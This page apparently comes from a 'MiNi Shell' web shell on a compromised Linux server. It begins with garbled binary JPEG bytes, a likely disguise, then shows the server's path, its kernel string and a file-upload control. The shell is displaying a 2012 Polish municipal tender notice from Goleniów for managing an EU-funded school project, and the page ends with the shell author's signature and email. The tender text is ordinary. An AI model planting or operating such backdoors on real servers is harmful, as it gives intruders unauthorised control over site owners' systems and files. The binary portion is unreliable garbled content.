JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121224/526534-N-2012.html

<p class="kh_header"><b>Goleniów: Wybór zespołu zarządzającego projektem  
pn. Nasza Lepsza Przyszłość realizowanego przez Gminę Goleniów 
współfinansowanego  za środków Unii Europejskiej 
w ramach Europejskiego Funduszu  Społecznego</b><br>
<b>Numer ogłoszenia: 526534 - 2012; data zamieszczenia: 24.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Goleniów , Plac Lotników 1, 72-100 Goleniów, woj. zachodniopomorskie, tel. 091 4698200, faks 091 4698298.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór zespołu zarządzającego projektem  
pn. Nasza Lepsza Przyszłość realizowanego przez Gminę Goleniów 
współfinansowanego  za środków Unii Europejskiej 
w ramach Europejskiego Funduszu  Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje wybór zespołu zarządzającego projektu WND-POKL:.09.01.02-32-009/12-00  pn. Nasza Lepsza Przyszłość współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki  Priorytet IX. Rozwój wykształcenia i kompetencji w regionach Działanie 9.1. Wyrównywanie szans edukacyjnych  i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszania różnic w jakości usług edukacyjnych. Projekt będzie realizowany w Gimnazjum Nr 2                       w Goleniowie, dla której organem prowadzącym jest  Gmina Goleniów, województwo zachodniopomorskie. Usługi będą realizowane  do 31 lipca 2014 r. 

Projektem zostanie objętych 350 uczniów Gimnazjum nr 2 w Goleniowie i  30  nauczycieli. Głównym celem  projektu jest podniesienie  wyników z egzaminów zewnętrznych z przedmiotów matematyczno-przyrodniczych i humanistycznych do czerwca 2014 roku.
Przedmiot zamówienia składa się z:

CZĘŚĆ Nr 1. Koordynator projektu

CZĘŚĆ Nr 2. Asystent Koordynatora projektu

CZĘŚĆ  Nr 3. Usługa monitoringu i ewaluacji projektu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż będzie dysponował:

na CZĘŚĆ Nr 1; Koordynator projektu:
co najmniej jedną osobą zdolną do wykonywania zamówienia, która posiada:
- wykształcenie wyższe
- minimum  2-letnie doświadczenie w zarządzaniu projektami z zakresu edukacji, dofinansowanych ze środków pozabudżetowych 

	na CZĘŚĆ Nr 2:Asystent koordynatora projektu:   
co najmniej jedną osobą zdolną do wykonywania zamówienia, która posiada:
- wykształcenie wyższe
- minimum  2-letnie doświadczenie w realizacji projektów z zakresu edukacji, dofinansowanych ze środków pozabudżetowych 


na CZĘŚĆ Nr 3: Usługa monitoringu i ewaluacji:  
- co najmniej jedną osobą zdolną do wykonywania zamówienia, która posiada doświadczenie                  
z zakresu monitoringu i ewaluacji projektów z zakresu edukacji, dofinansowanych ze środków pozabudżetowych .
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia,           w oparciu o informacje zawarte w dokumentach i oświadczeniach</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy 
2.Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru, zaświadczenia o wpisie do ewidencji działalności gospodarczej, umowy spółki cywilnej itp. 
3.W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument  ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu  o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. 
4.h)	W przypadku gdy  Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób na okres ich udziału w wykonywaniu zamówienia, zawierające listę osób, które zostaną przez ten podmiot udostępnione</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia  co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:

1.1.. Zmiana terminu realizacji przedmiotu umowy 
1. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,  w szczególnośc, wstrzymanie usługi przez Zamawiającego,
2. Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością realizacji usług.
3.Przedłużenie okresu trwania umowy z WUP w Szczecinie.

W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1 - 3 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 

2.2 Pozostałe zmiany:
a)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia 
3. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 

4. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2010 r., nr 113, poz. 759 z późn. zm.):
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego), 
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami,
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.goleniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gimnazjum Nr 2 w Goleniowie C. K. Norwida 172-100 Goleniów, Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.01.2013 godzina 15:00, miejsce: Gimnazjum Nr 2 w Goleniowie C. K. Norwida 172-100 Goleniów, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koordynator projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - zakres usług świadczonych  przez Koordynatora projektu:
a)   kierowanie wykonaniem projektu zgodnie z harmonogramem realizacji projektu.
b)   zapewnienie terminowej realizacji działań wynikających z Harmonogramu realizacji projektu  oraz   
      planowanie i koordynowanie tych działań,
c)   planowanie i organizacja  realizacji Projektu,
d)   zarządzanie planowanymi działaniami projektowymi,
e)    prowadzenie dokumentacji projektowej w oparciu o obowiązujące przepisy zgodnie z Programem  
      Operacyjnym Kapitał Ludzki,
f)   opracowanie wspólnie z Asystentem regulaminów rekrutacji i uczestnictwa w projekcie,
g)   prowadzenie bazy uczestników,
h)   organizacja i monitoring zadań wynikających z wniosku i Harmonogramu realizacji projektu,
i)    organizacja wszelkich czynności związanych z realizacją zajęć przewidzianych w ramach projektu             
      i  prowadzenie projektu do uzyskania pomyślnych rezultatów,
j)    nadzór nad bieżącą dokumentacją i zarządzanie budżetem,
k)    nadzór nad prawidłowym przebiegiem realizacji projektu zgodnie z Harmonogramem i budżetem,
l)    dokonywanie systematycznej kontroli pracy i uzyskanych efektów,
m)   wprowadzanie zmian do projektu w oparciu o  obowiązujące zapisy zawarte w dokumentacji 
       konkursowej, umowie o dofinansowanie projektu, w dokumentach programowych Programu 
       Operacyjnego Kapitał Ludzki,
n)   sporządzanie części merytorycznej wniosków o płatność,
o)   organizacja promocji projektu,
p)    reprezentowanie projektu na zewnątrz, udział w kampaniach promocyjno- informacyjnych,
q)     współpraca przy wyborze Wykonawców,
r)    kontaktowanie się z instytucją wdrażającą oraz pośredniczącą i innymi instytucjami lub 
       organizacjami 
      zaangażowanymi bezpośrednio lub pośrednio w realizację projektu,
s)   nadzorowanie organizacji zamówień publicznych, kontrola  zakupów na rzecz projektu,
t)  wykonanie usługi w wymiarze  co najmniej 4 godzin tygodniowo,
u) obecność w jednostce gdzie będzie realizowany projekt tj. Gimnazjum Nr 2 w Goleniowie  ul. C.K. Norwida 1 -co najmniej 3 razy w tygodniu w okresie trwania zajęć dydaktycznych, a w okresie gdy zajęcia dydaktyczne nie  są prowadzone- wykonywanie zadań zgodnie z zakresem i harmonogramem świadczonych usług..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Asystent Koordynatora projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres usług świadczonych przez  Asystenta Koordynatora projektu:

a)    opracowanie wspólnie z Koordynatorem projektu regulaminów rekrutacji i uczestnictwa                           
       w rekrutacji, przygotowywanie dokumentacji projektowej w tym: deklaracji uczestnictwa, zgody        
       na przetwarzanie danych osobowych, kontrola list obecności,
b)   kontrolowanie zadań składających się na proces rekrutacji BO,
c)   logistyczna organizacja zajęć wyrównawczych i pozalekcyjnych wynikających                                              
       z  harmonogramu wniosku o dofinansowanie,
d)   wybór we współpracy z prowadzącymi zajęcia materiałów dydaktycznych,
e)   kontrola dokumentacji prowadzonych zajęć,
f)   bieżący monitoring i kontrola merytoryczna jakości edukacyjnych działań projektowych,
g)   ewidencja dokumentów,
h)   koordynowanie  zakupów na rzecz projektu,
i)    sporządzanie sprawozdań w ramach PEFS,
j)    współpraca z koordynatorem,
k) zbieranie, kopiowanie i przekazywanie księgowej dowodów zakupu towarów i usług,
l)   wykonanie usługi w wymiarze  co najmniej 4 godzin tygodniowo,
m) obecność w jednostce gdzie będzie realizowany projekt tj. Gimnazjum Nr 2 w Goleniowie  ul. C.K. Norwida 1 -co najmniej 3 razy w tygodniu w okresie trwania zajęć dydaktycznych, a w okresie gdy zajęcia dydaktyczne nie  są prowadzone- wykonywanie zadań zgodnie z zakresem i harmonogramem świadczonych usług..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa monitoringu i ewaluacji projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zakres świadczonych usług monitoringu i ewaluacji projektu:
  a)   wykonanie przedmiotu umowy  zgodnie z harmonogramem działań  projektu,
  b)    systematyczne monitorowanie postępu rzeczowego projektu,
  c)   sporządzanie sprawozdań comiesięcznych dotyczących  monitoringu i ewaluacji przez  okres trwania   
         umowy,
  d)   monitorowanie zakładanych rezultatów ze zgodnością realizowanego projektu oraz opracowywanie               
         i udostępnianie materiałów na stronie internetowe projektu,
  e)   przygotowywanie raportów ewaluacyjnych, w których zawierana będzie informacja o:
   -    postępie rzeczowym realizowanych działań merytorycznych i ich zgodność z harmonogramem,
   -   stopniu osiągniętych  rezultatów i wskaźników (porównania stanu faktycznego z wymaganym,      
        weryfikacja poprawności mierzenia osiąganych rezultatów itp.),
   -    poprawność w stosowaniu PZP,
   -    innych istotnych kwestiach prawnych i organizacyjnych mających wpływ na realizację projektu, 
  f)   przygotowywanie kwestionariuszy ankietowych ich przeprowadzanie i badanie wyników nauczania            
        ( na początek i na koniec każdego cyklu zajęć), 
  g)   współpraca z koordynatorem i asystentem projektu,
  h)   sporządzanie raz na kwartał podsumowania, ewaluacji kwartalnej i rocznej oraz sporządzenie  
         pełnego raportu ewaluacyjnego na zakończenie projektu,
   i)   prowadzenie dokumentacji tj. karta czasu pracy, planu monitoringu i ewaluacji,
   j)   kontrola dziennika i list obecności na zlecenie koordynatora raz na  sześć miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com